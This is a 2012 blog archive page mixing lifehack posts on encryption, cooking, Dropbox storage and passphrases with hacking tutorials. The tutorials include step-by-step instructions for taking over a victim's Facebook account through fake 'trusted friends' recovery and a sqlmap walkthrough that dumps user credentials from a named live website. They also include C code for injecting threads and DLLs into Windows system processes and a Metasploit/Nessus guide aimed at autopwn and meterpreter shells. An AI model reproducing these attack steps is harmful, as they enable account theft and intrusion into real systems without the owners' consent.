Showing posts with label using. Show all posts
Showing posts with label using. Show all posts

Monday, March 26, 2012

The Importance of Using Mobile Encryption

This might come as a surprise to you, or perhaps even alarm you, but on the city of London’s public transport system alone, around 200 laptops are handed into lost-property offices every day.  This figure, which doesn’t even include all the ones that are never recovered, extrapolates out to over 50,000 every year just for the buses, taxis and underground trains in a single British city.


London is the country’s largest centre for business, with head offices for many major multi-nationals, web commerce firms and government agencies (including the security services and the armed forces).


It is reasonable to assume that the majority of the lost laptops, and remember that 200 a day figure is only for the ones that are recovered, are business machines that could will certainly be carrying private company emails and possibly even extensive customer or business project data.


Now with a business machine there will be a log-in for a laptop. But is it ever really enough?  The one thing that a password won’t protect against is the physical removal of the hard disk from a laptop, something that’s becoming easier to do as the hardware in many business machines becomes more user-upgradable.  I have a dock for a laptop drive that I need for my work.  It cost me a little over £10 and its USB3 connection means I can copy the entire contents off a drive in short order.


Even putting a system password on the laptop’s BIOS won’t protect against this.  But how likely is it that anybody would ever physically remove a hard disk anyway?  It could be argued that any thief would simply reformat a disk they couldn’t access, wiping the data.


While this might be true for some less-educated and tech-savvy thieves, the value of data is rising every day and commercially such information can be sold, used for corporate blackmail or perhaps even worse.  With this I mean that the fines for breaches of the data protection act in the UK can be harsh, especially with the high-profile breaches we’ve heard about over the last few years.  These breaches again, don’t forget, are only the ones that we’ve heard about.  We can be certain that there are a great many more that occur every single day.


So how can your company, or an individual, protect their data on a laptop when lugging it around in the back seat of the car, on the tube or in a taxi?  The Encrypting File System that’s been a part of Windows for over a decade is one solution, but it’s not ideal as it maintains file encryption when files are copied off the computer.  If something then goes wrong with the host computer you could find yourself unable to access both the original and the now encrypted backups.


Bitlocker in Windows Vista and Windows 7 is the answer, and this is a feature that will expanded and carried forward into new versions of Windows.  It is a full-disc encryption system that is so secure that the US State Department once asked Microsoft to put in a back door (which they sensibly refused to do).


Laptops with Trusted Platform Module (TPM) chips on the motherboards which carry the encryption keys are becoming much cheaper and more commonplace.  This chip will prevent the data form being read even when the hard disk is removed.  Bitlocker is, frankly, the only way to secure your data for laptops running Windows.


So why should you do this?  After all, you can’t afford to replace all your laptops today with TPM-enabled ones.  As a purchasing policy for any company this should be at or near the top of the list.  The data protection registrar in the UK is getting less and less tolerant every day with privacy and data breaches, and the EU is also jumping in with their own legislation and fines.


If those fines don’t put your company is a very difficult financial position then the negative publicity and the loss of customer confidence could shut you down completely.  It is wise to remember that even in this social Internet age, people do not give away their personal data freely.  Everyone is becoming more aware and savvy of the need to protect their privacy, and if that means withdrawing completely from a company, online or otherwise, to do so they probably won’t hesitate.

Solid State Drives And Encryption, A No-Go?
The Importance of Binary Numbers in Computing
Avoiding EFS Encryption Disasters in Windows
Baresite Makes Mobile Browsing Affordable
Defeating Disk Encryption

Saturday, March 24, 2012

Deseed a Pomegranate in 10 Seconds Using a Wooden Spoon [Video]

 Pomegranates are one of the best parts of Winter, but they take a lot of work to peel and deseed. YouTube user NaturalMarketer shows us how much time we've wasted by deseeding an entire pomegranate in mere seconds.


All you need to do is cut it in half as normal, push out the center a bit, then just start whacking the back of it with a wooden spoon. If done correctly, all the seeds should fall right out into the bowl. Check out the video above to see this genius trick in action.

Tuesday, March 20, 2012

Hack Facebook Accounts Using Trusted Friends Vulnerability


Hi guys, Sorry for not updating the blog i was really buys with my exams today i got some free time and i decide to share this interesting trick Hack Facebook Accounts Using Trusted Friends Vulnerability, 

Most of you might already know that facebook has  brought a new feature Three Trusted Friends Password Recovery ,This feature comes handy when you have lost your password or you don’t have any access to your default email address Facebook will send your recovery emails to 3 trusted friends you choose and hence you can retrieve account password again .But this is a serious vulnerability and this can be abused by hackers .In the following tut will show how you can exploit this vulnerability to hack Facebook accounts


Concept Behind The Hack
As explained earlier Facebook allows three trusted friend to retrieve passwords but what if we are the three trusted friends ? So the idea here is create three fake accounts and become victims friends after which we simply fallow the steps to retrieve Facebook  password


Demonstration


1. First create three fake Facebook accounts , then become friends with your victim


2. Now go to Facebook.com and click on forgot your password as shown


3. Now enter all the info that you know about the victim  such as name ,email id as shown  finally click on search

4. Now Facebook will show some information about how many emails are linked to the account, click on i no longer have access to these as shown


5. Now it will prompt you to enter a new email address on which you will get the password resetting option,  I suggest you create a Fake or Temporary email address for safety purposes


6. Now face book will prompt you to answer some  security questions  if you have some guesses that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page as shown

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake accounts that you created earlier and added into the victims account.


8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

How To secure Yourself From this Attack


Simply Don't friend people whom you don't Know ,you can also have a look at my article on 5ways on How to Protect your Facebook account from hackers


Hope you enjoyed the article , for further details and clarifications please pass you comments


Monday, March 19, 2012

Fake a Latte Using a Milk Frother and Your Microwave [Video]

 If you love the taste of lattes but don't have a milk steamer or the time to sit and whisk milk in a pot until it's aerated and frothy, this simple trick from the folks at America's Test Kitchen will give you a pretty close approximation in a fraction of the time. All you need is some coffee, some milk, your microwave, and a cheap milk frother you can get at any department store.


It's pretty straight forward—just put the milk (and any sugar you might want) in the microwave to heat it up (but not boil it,) and then use the frother on the milk to get it nice and foamy. Then just top off your mug with hot coffee, and you have yourself a tasty hot drink. Granted, the milk frother is the weak part of this tip—not everyone just has one lying around—but if you do, it's a great way to make a fancy drink at home in just a couple of seconds. If you keep one at the office, you never know, it might even turn that push-pot coffee into something palatable.


What do you think? Worthwhile idea, or just another gadget cluttering up your kitchen? Share your coffee prep tips in the comments below.

Sunday, March 18, 2012

SQL Injection part 4 -Hack websites using sqlmap


In my previous articles, i have shown you how we can hack websites using Simple SQL injection and Query based basic SQL injection and blind SQL injections. Today i am going to show you how we can hack websites using SQLmap. When manual methods donot let me hack the websites,then Sqlmap is my favourite tool. So before proceeding into this article i would like to suggest you to read my previous articles on SQLinjections, if you have missed them.

What is SQLMAP?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Things you require
1) BackTrack 5
2) A vulnerable website :p


The vulnerable link i am going to use is

http://www.targetsite.com/item.php?id=200
Step by step Procedure to hack
First open Backtrack5 and then open SQLMAP. You can open SQLMAP by doing the following.
Applications-->backtrack-->Exploitation tools-->web exploitation tools-->sqlmap.

It opens your sqlmap console .
Scanning the URL and finding out the database names
Now i am going to scan the url using the following command.

./sqlmap.py -u  http://www.targetsite.com/item.php?id=200 –dbs
Here –u is for URL .
You can also scan the entire website by simply replacing the above URL with the website’s URL.
Now i am going to scan the link. It has shown me a very good message that “GET parameter  “id” is vulnerable”.
And asked me to continue or stop. As i have already got a vulnerable parameter, i have stopped by pressing ‘N’. You can continue the scan if you want.
Finding out table names
Great..!! We got the database names. Now we need to find out the table and column names. As information_schema is for metadata, i am going with the database “waterufo_net”.
The following query gives me the table names.

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net
Here –D is to specify the name of the database.

Finding out column names
Fine.. Now we got 6 tables. As we are always interested in usernames and passwords, lets move on to the fl_users  table and find the column names in that table.
So we use the following query

./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D waterufo_net
Here -T is for tablename.


Retrieving Data
We got all the columns from the table fl_users. Now we have to retrieve  the data from the database. For that we need to write the following query. We are just adding –dump to the above query.

./sqlmap.py -u http://www.targetsite.com/item.php?id=200 --columns -T fl_users -D waterufo_net –dump


We got all the data we want. I hope you know what to do now. If you don’t, please read my previous articles on SQL injections.

Saturday, March 17, 2012

Get 3GB of Free Space on Dropbox By Using Camera Upload [Dropbox]

If you missed out on the last free online storage space offer from Dropbox, here's another one you can grab: a total of 3GB of extra space just by using the Camera Upload feature to put photos and videos into Dropbox.


If you took advantage of the beta offer in February (February 2 to 23) when Dropbox offered 5GB of extra space, but didn't finish uploading for some reason, you can still upload your photos and videos and get the max 5GB instead of the 3GB, but it doesn't look like you can grab an additional 3GB on top of that.


Everyone else can bump up their storage space to a total of 3GB extra by using the Android app's camera upload feature or the Camera Upload feature from the desktop application; you'll need the experimental forum build (1.3.4 or higher) for the desktop app. The camera upload feature automatically uploads photos and videos to your Dropbox account.


Dropbox will add 500MB of free space the first time you add a photo or video using the feature, then for every 500MB you upload, another 500MB of extra storage.


See the Dropbox help page below for more info or the comments in our previous post about the 5GB offer for some useful tips on getting enough photos and videos uploaded.

How do I get free space for using Camera Upload? | Dropbox via Slickdeals

Ask and Answer Questions About Using News Feeds [Help Yourself]

 Every day we're on the lookout for ways to make your work easier and your life better, but Lifehacker readers are smart, insightful folks with all kinds of expertise to share, and we want to give everyone regular access to that exceptional hive mind. Help Yourself is a daily thread where readers can ask and answer questions about tech, productivity, life hacks, and whatever else you need help with.


Using news feeds to keep up with your favorite sites or stay on top of news in your field can save a lot of time, but it can also get overwhelming. If you're tracking just a few sites, you may find yourself clicking through and browsing the full sites more often than not, anyway, whereas if you keep adding sites, more of the posts you really want to see might slip through the cracks. We've shown you how to make your feeds more manageable and recommended feed readers for different platforms, and you told us your favorite reader. Are you thinking about getting started with news feeds? Finding better alternatives to RSS? Have some feed-fu you'd like to share? Ask and answer questions about using news feeds in the comments.

Friday, March 16, 2012

Using Common Phrases Makes Your Passphrase Password Useless: Here’s How to Pick a Better Phrase [Security]

 We've discussed how using passphrases as passwords can boost your security, but if you've chosen a phrase used in every-day speech, you're not doing yourself—or your data—any favors. According to a new Cambridge study, a common phrase, like, say, "outofthepark," is only marginally more secure than a dictionary word, and anyone looking to crack your password already knows to try common phrases along with common words. If you prefer passphrases, here's how to make them more secure.


 


The reason that many password systems won't allow you to choose dictionary words as you passwords—or at least require you to add numbers, capitals, or special characters to those words—is because the first thing a hacker will do to try and guess a password is try every word in the dictionary to see if they can get in. Even swapping out "i" for "1" or "e" for "3" often isn't enough—the fact that those tricks have been around for as long as they have means that those common substitutions are easily added to your dictionary list and included with the brute force attack. The goal of encouraging passphrases instead is to create credentials that are entirely nonsensical to a password cracking utility, but memorable to the human who needs to access a given system every day. Photo by Francis Storr.


The trouble though is that so many people, when they embrace passphrases, use common phrases from books, popular movies, memorable quotes, sports teams, or other proper nouns that are easily guessed. A group of researchers from Cambridge University recently published a study (PDF link) where they found that using a dictionary of these common phrases allowed them to crack open about 8,000 passphrases in Amazon's old PayPhrase system. They conclude that passphrases as a password system ultimately provide less then 30 bits of security, which they note is too weak to withstand most online attacks. Ars Technica explains what this means in plain terms:



The "30 bits of security" means the chances of a single guess cracking a four-word passphrase would be one in 2^30. What's more, the two-word phrases cracked in the study provided just 2^20.8 (or 20,656/0.0113) bits of security. Another way of expressing the same finding is that a dictionary of slightly less than 21,000 phrases is enough to guess the login credentials that slightly more than 1 percent of people in the real world will use.


Admittedly, 1 percent of phrases is a very small number, but it's still cause for concern, and drives home the point: any security system, even if it's well built and sufficiently complex, can easily fall prey to user-introduced patterns. In the end, the user—and their password—is almost always the weakest link.


 


This doesn't mean that all hope is lost for passphrases, or that you should give up on them and go back to standard strong passwords. Honestly, if you can combine the two, you should—the strength of a strong password with letters, numbers, varying case, and special characters is improved significantly when strung together as a phrase. The key is to pick a phrase that's easy for you to remember, but not, for example, your favorite sports team, or the name of your city and state strung together, or the make and model of your car. Yes, it diminishes the ease of memorization, but it vastly improves your security.


The study explicitly points out that "multi-word phrases, if chosen naively according to natural language tendencies, are not as effective at mitigated guessing attacks as alternate choices, such as choosing 2 random words or choosing a personal name at random." So, in order to boost your passphrase security, you need to pick words that matter to you, but don't matter to anyone else. For example, "NissanAltima" may not be a dictionary word, but it's a proper noun that's easily guessed. Instead, you might try "My03AltimaIsBlue."


When we discussed The XKCD passphrase generator, we pointed out another more secure method worth repeating. If you want to use your favorite lyric from a song, grab the first couple of characters from the words in your favorite line, instead of stringing the whole lyric together. We proposed that a Jackson 5 lover might extract a password from the lyrics "Oh baby give me one more chance to show you that I love you" and come up with "obgmomctsytily," which is significantly more secure.


The XKCD Password Generator itself is a robust tool to generate passwords, mostly because the words it strings together are random—they have no meaning behind them, and would be difficult to break in a dictionary attack, and even harder if you mix case and special characters. You could also take it up a notch and use the shift-to-right method for your passwords, which really makes them unintelligible.


Finally, once you've done all of this, and built a great passphrase that's difficult to crack and hard to break, do yourself a favor and plug it into a password management system like LastPass, KeePass, or 1Password, so you can use different strong passphrases for every service you use, and one memorable one to get into your password vault.

Thursday, March 15, 2012

8 Things You Can Cook More Efficiently Using an Oven


We all want to make the best use of our time, and time in the kitchen is no exception. For many of us, cooking has become synonymous with drudgery — with that perennial question, “What’s for dinner?” striking a silent sigh from within.


Yet cooking from scratch is one of the best things we can do for ourselves and our families.


While I do make my living as a cook, I’m just like the rest of you. I don’t want to spend needless time in the kitchen at the end of a long workday…or on my days off. I also don’t want to have to fuss over sauces or stove top dishes that require constant supervision to save them from the risk of total ruin.


One of the best kept secrets for efficient and easy food prep in the kitchen I discovered early on was to use the oven — and for a lot more things than pies, cakes, or roast chicken. It really is the ultimate kitchen multi-tasking device. I can get a recipe written up and laundry done while the soup I’m going to have for dinner roasts quietly in the oven.

Using the power of dry heat is a kinder, gentler way of coaxing flavour from simple ingredients. Don’t believe me? Try roasting your green beans next time you think about steaming them.It’s mostly a “hands-off process” once you’ve completed all the preparation – the oven does all of the hard work. Perfect for those of us who work from home, or a Sunday afternoon…when you’re likely home anyway.If you have time (but not attention), the oven is the perfect way to cook. Just make sure you put a timer on — and like that commercial from the 80's used to say: Set it, and forget it!Despite the hype about low-cost fast food, cooking from scratch is cheaper — and better for you. Using the oven makes it easy to do that with very humble, inexpensive ingredients.There’s no special equipment needed. Think of your oven like a big slow-cooker. With multiple settings, no need for a new piece of equipment, and no loss of valuable counter real estate. I’ve had best success with cookware I already have –- sheet pans and parchment paper for many things, and cast-iron frying pans and pyrex casserole dishes for things that are a bit more fluid.Soup. Any soup that is going to be pureed and/or that requires a flavour base of browned aromatics (onions, carrots, celery, garlic) is much easier to do in the oven. A rough chop, then sprinkle with salt and pepper, and finally a toss to lightly coat with oil. Bake at 375 degrees until everything is fork-tender. Puree in a large bowl with hot chicken stock and adjust seasonings. That’s it!Chickpeas and other dried legumes. Dried legumes are so much more frugal than canned, but usually involve soaking, rinsing and simmering. Cooking chickpeas in the oven is easy as placing them in a casserole with a heavy lid — no soaking required. Toss in a small onion, whole garlic clove and a bay leaf, cover with 1” of water and bake in the oven at 350 degrees for 2-3 hours. Bake up a lot and you can freeze the extras with a bit of the cooking liquid for later use.Jam. Cooking jam the classic way involves cooking fruit and sugar on the stove top until it reaches that magical temperature of 220 degrees. This usually requires stirring to avoid scorching on the bottom, and sometimes some scorched fingers in the process as it bubbles up. Most jam recipes follow a basic ratio of fruit:sugar. Just follow this ratio, but spread everything out in large roasting pan. Cook at 300 degrees for about 2 hours, with a stir every 30 minutes or so.  It will get thicker as you get close to the end.Beets. Are you tired of trying to figure out how to peel beets without running the risk of maiming yourself? Roast them unpeeled! 350 degrees in an oblong pyrex pan covered with foil; there’s not even any oil needed – the moisture in the beets does it all. After 60-70 minutes (for medium-sized beets) they should be tender through. Slice off the top and bottom and the peels will slip off!  Chop up and store to use in salads, or for quick pickles through the week.Savoury salads. Roasted root vegetables make a great base for savoury salads. Roast these on a parchment lined sheet pan with a bit of olive oil, onions, garlic, balsamic vinegar and spices if you like (smoked paprika makes a great addition, or try some ground coriander with your carrots). Roasting everything with the balsamic gives it a complex, new dimension that you won’t get by dressing it after the fact.Tomato sauce. Tomatoes taste best when they have been reduced slowly, with a bit of caramelization happening (for the geeks out there, look up the Maillard reaction). It’s super easy to achieve this using the oven. Fresh tomatoes are best — if they’re in season, but canned are excellent if they’re not. Add onions, rosemary, whole peeled garlic cloves, salt, pepper, and a bit of olive oil. Roast on a parchment-lined sheet pan.Caramelized onions. No worry about them burning. Peel and chop as many onions as will fit on your sheet pan. Chop them pole-pole, and toss with a bit of olive oil, and 1/2 tsp salt. Roast on a parchment-lined sheet pan for 60 minutes at 375 degrees.Polenta. Classic polenta requires stirring…and monitoring…and more stirring. Using the oven to bake polenta is dead-easy and only requires one intermediate step along the way — with equally delicious results! Bake 1 cup polenta, 4 cups water, 1 tsp or so salt, at 350 degrees in a covered 3 quart casserole for 1 hour. Check it for moisture, and stir in cheese if you want. Bake for another 15 minutes and serve.

So now that you have this technique at your disposal, play around with it. Start thinking of your oven as a “mechanical prep-chef” — and think about the different ways you might use a big batch of roasted beets, chickpeas, or tomato sauce throughout the week. A large batch of polenta can be eaten as a side dish, and leftovers can be chilled in a loaf pan and eaten sliced and fried until crispy 2 nights later.


The more ingredients you have prepared in advance, the less stressful dinner will be!

Saturday, March 10, 2012

Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows 7

Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows 7 | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise  HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows 7


Windows provides API function called, CreateRemoteThread Ref 2 which allows any process to execute thread in the context of remote process. This method has been mainly used to inject DLL into remote process, this technique is popularly known as 'DLL Injection'. Especially malware programs exploited this mechanism to evade their detection by injecting their DLL into legitimate processes such as Explorer.exe, Winlogon.exe etc. 

Vista & Session Separation 

This DLL Injection technique using CreateRemoteThread technique has worked flawlessly till Vista without any limitations. However since Vista onwards things have changed with the introduction of 'Session Separation'Ref 3. This was one of the many defenses introduced in Vista towards securing the system. 'Session Separation' ensured that core system processes including services always run in session 0 while all user process's run in different sessions. As a result any process running in user session failed to inject DLL into system process as CreateRemoteThread did not work across session boundaries. 


This is clearly evident from the MSDN documentation of CreateRemoteThread Ref 2 function... 


"Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process."

About NtCreateThreadEx Function

With the failure of CreateRemoteThread, there was a need for universal solution for remote thread execution on Vista and Windows 7 platform. Then comes the function, NtCreateThreadEx Ref 1, the undocumented function which provides complete solution for executing remote thread across session boundaries. It allows any process to inject DLL into any other process irrespective of the session in which it is running as long as it has sufficient privileges.  


Here is the prototype of NtCreateThreadEx function [undocumented]   

typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN ULONG StackZeroBits, IN ULONG SizeOfStackCommit, IN ULONG SizeOfStackReserve, OUT LPVOID lpBytesBuffer);

This function is almost similar to CreateRemoteThread function except the last parameter which takes unknown buffer structure. Here is the definition of that buffer structure parameter...    

//Buffer argument passed to NtCreateThreadEx function struct NtCreateThreadExBuffer{ ULONG Size; ULONG Unknown1; ULONG Unknown2; PULONG Unknown3; ULONG Unknown4; ULONG Unknown5; ULONG Unknown6; PULONG Unknown7; ULONG Unknown8;};

This information is derived based on reverse engineering work. Hence meanings and importance of internal fields of this buffer structure is not clear.

Executing Remote Thread into System Process using NtCreateThreadEx

FunctionThe steps involved in the execution of the remote thread using NtCreateThreadEx is almost similar to that of CreateRemoteThread function. Hence the traditional steps such as allocating memory, copying the thread code into remote process are not repeated here. For detailed steps you can refer to article, "Three Ways to Inject Your Code into Another Process"  Ref 4.


Before we begin, we need to load NtCreateThreadEx function from Ntdll.dll as shown below.

HMODULE modNtDll = GetModuleHandle("ntdll.dll"); if( !modNtDll ){    printf("\n failed to get module handle for ntdll.dll, Error=0x%.8x", GetLastError());    return;}LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx");if( !funNtCreateThreadEx ){   printf("\n failed to get funtion address from ntdll.dll, Error=0x%.8x", GetLastError());   return;} 

Now setup the buffer structure which is passed as last parameter to NtCreateThreadEx function. 

//setup and initialize the bufferNtCreateThreadExBuffer ntbuffer; memset (&ntbuffer,0,sizeof(NtCreateThreadExBuffer));DWORD temp1 = 0;DWORD temp2 = 0; ntbuffer.Size = sizeof(NtCreateThreadExBuffer);ntbuffer.Unknown1 = 0x10003;ntbuffer.Unknown2 = 0x8;ntbuffer.Unknown3 = &temp2;ntbuffer.Unknown4 = 0;ntbuffer.Unknown5 = 0x10004;ntbuffer.Unknown6 = 4;ntbuffer.Unknown7 = &temp1;ntbuffer.Unknown8 = 0;

Finally execute remote thread 'pRemoteFunction' into remote process using NtCreateThreadEx function. Here one can use 'LoadLibrary' function address instead of 'pRemoteFunction' thread to implement 'DLL Injection' technique.

NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, hProcess, (LPTHREAD_START_ROUTINE) pRemoteParameter, pRemoteParameter, FALSE, //start instantly NULL, NULL, NULL, &ntbuffer);Now check for the result of NtCreateThreadEx function and then wait for it to execute completely. if (hThread == NULL){    printf("\n NtCreateThreadEx failed, Error=0x%.8x", GetLastError());    return;}//Wait for thread to complete....WaitForSingleObject(hThread, INFINITE);  

Finally retrieve the return value from the remote thread function, 'pRemoteFunction' to verify the result of function execution.

//Check the return code from remote thread function int dwExitCode;if( GetExitCodeThread(hThread, (DWORD*) &dwExitCode) ){     printf("\n Remote thread returned with status = %d", dwExitCode);} CloseHandle(hThread);

The steps illustrated above are almost similar except that here NtCreateThreadEx is used instead of CreateRemoteThread for creating thread in the context of remote process

Limitations of NtCreateThreadEx Method

Though NtCreateThreadEx provides universal solution on Vista/Win 7 platform for remote thread execution, it is risky to use in the production code as it is an undocumented function. As things may change with new version and suppor packs, enough testing is necessary before putting it into production especially when injecting code into system critical process such as LSASS.EXE, CSRSS.EXE.


Another limitation is that it cannot be used in earlier platforms before Vista, such as Windows XP because NtCreateThreadEx function is available only Vista onwards. However developers can easily tune their code to dynamically use CreateRemoteThread function on XP and NtCreateThreadEx for Vista/Windows 7.

Alternative Techniques 

Another way to inject DLL into system process is to write the service process (which will run in session 0) and then issue the command from user process to that service to inject DLL into any system process using the CreateRemoteThread function.
 
This technique will work for any system process running in session 0. But it will fail to execute thread into any other process running in session other than 0. 
 
Though it is a clumsy way of doing the work, it still holds good solution to inject thread into system process only.

Conclusion

This article provides practical implementation of using NtCreateThreadEx function to execute remote thread into any process on Vista/Windows 7 platform. Though it is undocumented function, it provides universal solution for executing code in any process across session boundaries imposed by Vista/Windows 7.

ReferencesNtCreateThreadEx FunctionMSDN Documentation of CreateRemoteThread FunctionImpact of Session 0 Isolation on ServicesThree ways to inject code into remote processAbout The AuthorNagareshwar is a security professional with the unbeaten passion towards Computer Security, mainly involved in Reverse Engineering, Security Research and developing Security Tools. He holds engineering degree in Computer Science from National Institute of Technology of Karnataka, Surathkal (KREC), India. He has professional experience of around 6+ years spanning across Novell & Citrix where he has worked on security and application virtualization technologies.

 


 

Microsoft VistaMicrosoft WindowstechGyanTerminal ServicesWindows 7 Add new comment Author  CHMag Collector's Edition Vol II


 

Using Metasploit with Nessus Bridge on Ubuntu

Using Metasploit with Nessus Bridge on Ubuntu | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise Home HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home Using Metasploit with Nessus Bridge on Ubuntu Ever wondered how to use the autopwn feature in Metasploit on Ubuntu? Want to run nessus from within metasploit? What database should I use; sqlite3 or postgres? I will explain the benefits of both. The concept will allow you to do various tasks with your nessus server and nmap from within the msf command line. Nessus is a vulnerability scanner program, it is free for personal use using the home home. They also have a nessus for business which requires a fee. I will be discussing the nessus for home use and using it with the popular metasploit framework. Acquire the latest release of nessus homefeed Nessus-4.4.1-ubuntu1010_i386.deb and register for the activation code. Follow the instructions listed in the document ion for installing with Ubuntu and start to configure. Nessus daemon cant be started until nessus has been registered and the plugin (http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code) download has occurred. $ sudo /opt/nessus/bin/nessus-fetch –register 'registration code from nessus'

Add user:- $ sudo /opt/nessus/sbin/nessus-adduser

Make cert:- $ sudo /opt/nessus/sbin/nessus-mkcert
 

Start the nessus Daemon:- $ sudo /etc/init.d/nessusd start

 Open up web browser to https://localhost:8834, login and complete a policy for your scans. I would create a number of policies based on the different systems that you will be scanning. If your scanning a windows environment then having the plugin for Linux and BSD are pointless. Also make sure that you have safe checks enabled, select a port scanner to use, select credentials, select plugins (remember not to enable ones that will bounce the box), and select preferences. When finished you should have a number of different policies that will be numbered 1 – however many you have and you can give them names for example for scanning windows environment you can label them as windows. Now you can logout of nessus and close the web browser. Now open up a terminal and browse to where metasploit is installed and run an update. $ cd /opt/framework-3.6.0/msf3  $ sudo svn update

 Before we start the msfconsole lets get our database in proper order. Now I have used sqlite3 in the past and even did a tutorial on my website using sqlite3 http://pbnetworks.net/?cmd=bbs&id=35 which worked fine but sometimes it may not work and give error warning 'Note that sqlite is not supported due to numerous issues. It may work, but don't count on it.' Postgres is the recommended database for Metasploit. So let?s install the postgres database and libraries. $ sudo apt-get install postgresql-8.4   
$ sudo apt-get install rubygems libpq-dev   
$ sudo gem install pg   
$ sudo apt-get install libreadline-dev   
$ sudo apt-get install libssl-dev   
$ sudo apt-get install libpq5   
$ sudo apt-get install ruby-dev

Now every time you start your system start the database before you start metasploit $ sudo /etc/init.d/postgresql-8.4 start
 

You will need to become the system postgres user:- $ sudo -s  # su postgres

 Now you will need to create a database user: $ createuser -P

 Enter password for new role:Enter it again:Shall the new role be a superuser? (y/n) nShall the new role be allowed to create databases? (y/n) nshall the new role be allowed to create more new roles? (y/n) nNext we need to crate a database: $ createdb –owner= msf_database

 Now we can start up metasploit: :/opt/framework-3.6.0/msf3$ sudo ./msfconsole

 Enter in the following commands: msf> db_driver postgresql  
msf> db_connect :@127.0.0.1:5432/msf_database  
msf> db_hosts


 

Now before, when using sqlite3, creating and connecting to the database was easy. I would start up metasploit and issue the following commands: msf> db_driver sqlite3  msf> db_connect

 To verify if the database was connected I would issue the following command: msf> db_hosts

 If everything looked good I would have no errors and I could use the db_nmap command. But sometimes I would encounter errors and it would crash. Using postgres is more reliable than sqlite3 and it is also useful as I will describe later. Finally go ahead and enable the database on startup by issuing the following commands: msf> cat > ~/.msf3/msfconsole.rc  
db_driver postgresql  
db_connect :@127.0.0.1:5432/msf_database  
db_workspace -a MyProject  ^D

 Now the next time you fire up metasploit your database will automatically be up and you will be connected to it. Just make sure that you have postgres running, I run postgres manually before I start metasploit (See Figure #1). Figure 1: Notice that postgresql loads when first starting the msfconsole

Now that we have postgres as the database for metasploit lets start using nessus from within metasploit. Open up a second terminal and make sure nessus is running if not load the daemon. Now from the msfconsole load nessus (see figure #2). msf > load nessus

  Figure 2: Loading nessus from the msfconsole Now let see what kind of commands the Nessus Bridge for Metasploit 1.1 has given us, type nessus_help (see figure #3). msf > nessus_help

Figure 3: Nessus Help The commands are divided up into different sections labeled Generic, Reports, Scan, Plugin, User, and Policy commands. Before we can run a scan we need to connect to the nessus server by using the nessus_connect command. msf > nessus_connect :@localhost:8834 ok

 This should connect and authenticate you. From here you can run the scans, review the results, and load the scan results into the database and use autopwn feature. Or you can view the results and find a vulnerability with a system you scanned and throw a single exploit and get a meterpreter shell. Depending on the environment you may want to review the results of your nessus output and find the appropriate exploit to use instead of generating the noise of running autopwn. Now let?s start our scan by issuing nessus_scan_new command as follows nessus_scan_new (this was set in your nessus policy settings) (generic) (ip address) msf > nessus_scan_new 1 winXP_home 192.168.1.124

 To check up on the status of our scan use the nessus scan status feature (see figure #4). msf > nessus_scan_status

  Figure 4: Nessus Scan Status  When the scan has completed you can view the results using the following commands msf > nessus_report_list

 We can view a list of hosts from the report with the following command msf > nessus_report_hosts UID

 To view further information issue the following command:-msf > nessus_report_host_ports UID (see Figure #5)

Figure 5: nessus_report_host_ports 192.168.1.124 UID

To see a list of hosts issue the db_host command. If you want to remove hosts from the db_hosts file then issue thedb_del_host command (see Figure #6) 
Figure 6: db_del_host command Next we need to load the results into our database with the following command msf> nessus_report_get UID

 Now with the scan complete and the host listed in the db_hosts file you can run the autopwn tool or find an exploit that will work against the box. More on this in another article next month. Now lets take a look at using nmap within the metasploit framework. To use the nmap command from within the metasploit framework use the 'db_nmap' command to run nmap scans against targets and have the scan results stored in the database. When running on Back|Track I can issue many different nmap commands such as db_nmap -sS -sV -T 3 -P0 -O -D RND --packet-trace. Which show the results: -sS TCP SYN stealth scan, -sV version scan, -T 3 normal scan, -O find the operating system, -D RND use a decoy and generate a random, non-reserved IP address, and finally --packet-trace will trace packets and data sent and received. I like to use the packet-trace feature on large scans because if it fails you can see it. Now this is great feature to use while in the msfconsole but I can?t do this when using Unbuntu and connected to the postgres database as the postgres user. Why? Because I get an error saying that only the root user has the ability to use this nmap option (see Figure #7). I can use 'db_nmap -v -sV 192.168.15.0/24 --packet-trace' and the scan runs and produces an output. I have view the results with the following commands (Figure 8) msf > db_hosts  msf > db_services -c port,state


Figure 7: nmap error with postgres 

Now if I want to issue complex nmap scans I can exit out of the msf prompt, exit out of postgres, stop the database and login with sudo and use the sqlite3 database. The same command that the OS didn't allow me to use now can be used with no problem (Figure #9) 
Figure 8: db_namp using postgres database 
Figure 9: db_nmap using sqlite3  msf > db_nmap -sS -sV -T 4 -P0 -O 192.168.15.0/24 -D RND --packet-trace

 Look at the difference in results we now have after viewing information in the db_hosts and db_services -c port,state commands. Compare difference between figure #10 & figure #8. 
